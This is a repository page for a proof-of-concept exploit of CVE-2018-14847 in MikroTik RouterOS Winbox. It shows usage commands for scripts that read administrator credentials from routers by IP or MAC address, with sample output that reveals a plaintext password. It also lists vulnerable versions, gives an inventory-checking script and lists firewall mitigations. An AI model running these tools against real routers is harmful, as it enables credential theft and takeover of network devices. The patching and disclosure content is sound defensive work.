CVE-2018-14847 PoC: Winbox for MikroTik RouterOS security vulnerability

Associated Vulnerability
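Title: Winbox for MikroTik RouterOS security vulnerability (CVE-2018-14847)
Description: MikroTik RouterOS is a router operating system. Winbox for MikroTik RouterOS is an application for managing MikroTik RouterOS systems. A security vulnerability exists in Winbox for MikroTik RouterOS 6.42 and earlier. A remote attacker can exploit it by modifying a request to bypass authentication and read arbitrary files.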
Description
PoC of CVE-2018-14847 Mikrotik Vulnerability using simple script
Readme
# Mikrotik Login Exploit
PoC (Proof of Concept) for the MikroTik vulnerability CVE-2018-14847 (mainly in Winbox). It works by reading the password directly from RouterOS on the default port 8291.

Original by: https://github.com/BigNerd95/

## Requirements
- Python 3+

### Installation on Linux
```
apt install python3
```


## Usage Examples

#### WinBox (TCP/IP)
```
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
```
e.g.:
```
$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123
```

#### Using a MAC Address
You can use this script even without an IP address.

Use MACServerDiscover.py to scan for routers.
```
python3 MACServerDiscover.py
```
e.g.:
```
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa
```

Exploitation:
```
python3 MACServerExploit.py <MAC-ADDRESS>
```
e.g.:
```
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: oppaidaisuki123
```

## Vulnerable Versions
RouterOS releases from 2015-05-28 to 2018-04-20

RouterOS versions:

- Longterm: 6.30.1 - 6.40.7
- Stable: 6.29 - 6.42
- Beta: 6.29rc1 - 6.43rc3

More information: https://blog.mikrotik.com/security/winbox-vulnerability.html
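
For defenders, the version list above can be turned into an inventory check. This is an added example, not part of the original README or the upstream project; the channel labels (`longterm`, `stable`, `beta`), the function names and the sample inventory are assumptions constructed for illustration.

```python
import re

# Inclusive vulnerable ranges, copied from the "Vulnerable Versions" list above.
VULNERABLE_RANGES = {
    "longterm": ("6.30.1", "6.40.7"),
    "stable": ("6.29", "6.42"),
    "beta": ("6.29rc1", "6.43rc3"),
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:rc(\d+))?$")


def parse_version(text):
    """Convert '6.40.7' or '6.43rc3' into a tuple that sorts in release order."""
    match = _VERSION_RE.match(text.strip())
    if match is None:
        raise ValueError(f"unrecognised RouterOS version: {text!r}")
    major, minor, patch, rc = match.groups()
    # A release candidate precedes the final release with the same number,
    # so a version without an rc suffix sorts after every rcN.
    rc_key = int(rc) if rc is not None else float("inf")
    return (int(major), int(minor), int(patch or 0), rc_key)


def is_vulnerable(version, channel):
    """True if version lies inside the listed range for its release channel."""
    if channel not in VULNERABLE_RANGES:
        raise ValueError(f"unknown release channel: {channel!r}")
    low, high = VULNERABLE_RANGES[channel]
    return parse_version(low) <= parse_version(version) <= parse_version(high)


def audit(inventory):
    """Return the names of inventory entries that need upgrading."""
    return [name for name, channel, version in inventory
            if is_vulnerable(version, channel)]


# Constructed sample inventory: (device name, release channel, version).
SAMPLE_INVENTORY = [
    ("edge-01", "stable", "6.42"),
    ("edge-02", "stable", "6.42.1"),
    ("core-01", "longterm", "6.40.7"),
    ("core-02", "longterm", "6.40.8"),
    ("lab-01", "beta", "6.43rc3"),
    ("lab-02", "beta", "6.43rc4"),
]

if __name__ == "__main__":
    print(audit(SAMPLE_INVENTORY))
```

The range boundaries are inclusive, so a device on exactly 6.42 (stable) is flagged.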

## Exploit Prevention
- Upgrade RouterOS to 6.42+
- Disable Winbox
- Restrict the service by source address:
```
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
```
- Filter rules (ACL), block port 8291:
```
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
```
- Restrict Winbox login access via MAC address:
```
/tool mac-server mac-winbox
```
File Snapshot

```
[4.0K] /data/pocs/97c98a9b8fdca3b85a96dbb79df70359436bc9f8
├── [1.5K] extract_user.py
├── [ 991] MACServerDiscover.py
├── [5.1K] MACServerExploit.py
├── [1.6K] README.md
└── [2.2K] WinboxExploit.py

0 directories, 5 files
```